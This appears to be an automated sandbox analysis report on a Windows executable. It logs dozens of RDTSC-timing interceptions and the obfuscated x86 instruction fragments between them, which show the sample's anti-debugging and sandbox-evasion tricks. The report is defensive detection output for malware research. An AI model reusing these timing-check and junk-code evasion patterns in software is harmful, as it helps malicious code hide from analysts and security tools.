              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBB1C7 second address: FBB1E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F156h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBB1E9 second address: FBB1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBE080 second address: FBE0F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F335931F148h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 pushad 0x00000023 xor dword ptr [ebp+122D1DD9h], ebx 0x00000029 push ecx 0x0000002a movsx ecx, cx 0x0000002d pop ecx 0x0000002e popad 0x0000002f push 00000000h 0x00000031 movsx ebx, dx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F335931F148h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 cld 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F335931F157h 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBD23F second address: FBD250 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F335854CBBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBF149 second address: FBF14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBF14D second address: FBF153 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBF153 second address: FBF17D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F335931F14Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F335931F157h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBF17D second address: FBF182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBF314 second address: FBF380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007F335931F14Ah 0x0000000f and bx, 6C12h 0x00000014 pop edi 0x00000015 push dword ptr fs:[00000000h] 0x0000001c sub edi, dword ptr [ebp+122D2C71h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F335931F148h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D0BADh] 0x00000049 or dword ptr [ebp+122D1D5Dh], edi 0x0000004f push FFFFFFFFh 0x00000051 mov ebx, dword ptr [ebp+122D27C9h] 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBF380 second address: FBF387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FC97F6 second address: FC9810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F335931F154h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FC9810 second address: FC9833 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F335854CBB6h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007F335854CBC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F698CB second address: F698D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FC90D3 second address: FC90DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FC90DB second address: FC90E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FC90E1 second address: FC90E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FC9390 second address: FC93C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jmp 00007F335931F14Bh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F335931F146h 0x00000017 popad 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b jmp 00007F335931F14Ah 0x00000020 pop edx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD22D second address: FCD23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335854CBBBh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD23D second address: FCD27C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F335931F14Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push esi 0x00000013 push eax 0x00000014 jl 00007F335931F146h 0x0000001a pop eax 0x0000001b pop esi 0x0000001c mov eax, dword ptr [eax] 0x0000001e jc 00007F335931F152h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 pushad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD32A second address: FCD32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD32E second address: FCD33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD33B second address: FCD341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD341 second address: FCD346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD46A second address: FCD479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F335854CBBAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2846 second address: FD2854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2854 second address: FD2868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F335854CBBBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100872C second address: 1008760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F335931F14Ch 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jmp 00007F335931F154h 0x00000013 pop ebx 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 jbe 00007F335931F146h 0x0000001d pop edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1008760 second address: 100876A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F335854CBB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1008AAF second address: 1008AE5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F335931F157h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F335931F14Fh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F335931F155h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1008AE5 second address: 1008AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100C962 second address: 100C96A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CA9B second address: 100CAB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F335854CBBEh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007F335854CBB6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CAB9 second address: 100CABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CABD second address: 100CAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F335854CBB6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CAD0 second address: 100CAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CAD4 second address: 100CADA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CADA second address: 100CAF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335931F157h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CC5B second address: 100CC88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC7h 0x00000007 jmp 00007F335854CBC2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CDE0 second address: 100CDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F335931F14Eh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CDFD second address: 100CE05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CE05 second address: 100CE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100D0F9 second address: 100D103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F335854CBB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100D56E second address: 100D588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F335931F154h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1010444 second address: 1010448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1010448 second address: 1010463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1010463 second address: 1010468 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BE92 second address: 101BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F335931F14Eh 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007F335931F146h 0x00000012 js 00007F335931F14Eh 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BFEA second address: 101BFF6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BFF6 second address: 101C00F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F155h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C00F second address: 101C041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 ja 00007F335854CBB6h 0x0000000f jno 00007F335854CBB6h 0x00000015 jmp 00007F335854CBC7h 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C041 second address: 101C057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F335931F146h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e jnl 00007F335931F146h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C4E9 second address: 101C4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C667 second address: 101C66C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C66C second address: 101C69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F335854CBBDh 0x00000012 jg 00007F335854CBB6h 0x00000018 jmp 00007F335854CBBBh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C872 second address: 101C87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F335931F146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C87C second address: 101C880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C880 second address: 101C89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F335931F156h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101CCD9 second address: 101CCDF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101DC31 second address: 101DC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101DC37 second address: 101DC4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F335854CBBFh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BA33 second address: 101BA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F335931F14Eh 0x0000000a jns 00007F335931F146h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BA45 second address: 101BA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F335854CBB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BA51 second address: 101BA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BA55 second address: 101BA6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C12 second address: 1024C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335931F152h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C28 second address: 1024C38 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F335854CBB6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C38 second address: 1024C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F154h 0x00000007 jmp 00007F335931F153h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C63 second address: 1024C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F335854CBB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C6D second address: 1024C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C71 second address: 1024C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C77 second address: 1024C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F335931F14Eh 0x0000000d jmp 00007F335931F14Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C9A second address: 1024C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10324DF second address: 1032500 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F335931F14Bh 0x0000000e pushad 0x0000000f jmp 00007F335931F14Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 103204B second address: 103206A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335854CBBDh 0x00000009 popad 0x0000000a jmp 00007F335854CBBAh 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10321D9 second address: 10321E9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F335931F146h 0x00000008 jne 00007F335931F146h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1039BB1 second address: 1039BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 103E928 second address: 103E92C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 103E92C second address: 103E941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F335854CBBFh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 103E941 second address: 103E94C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F335931F146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 103E94C second address: 103E955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 103E955 second address: 103E95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F335931F146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10458AA second address: 10458B8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F335854CBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10458B8 second address: 10458F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Dh 0x00000007 jl 00007F335931F146h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jnc 00007F335931F15Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1045724 second address: 1045730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F335854CBB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10486AF second address: 10486B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10486B5 second address: 10486EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007F335854CBC9h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jbe 00007F335854CBB6h 0x0000001c pop eax 0x0000001d popad 0x0000001e pushad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
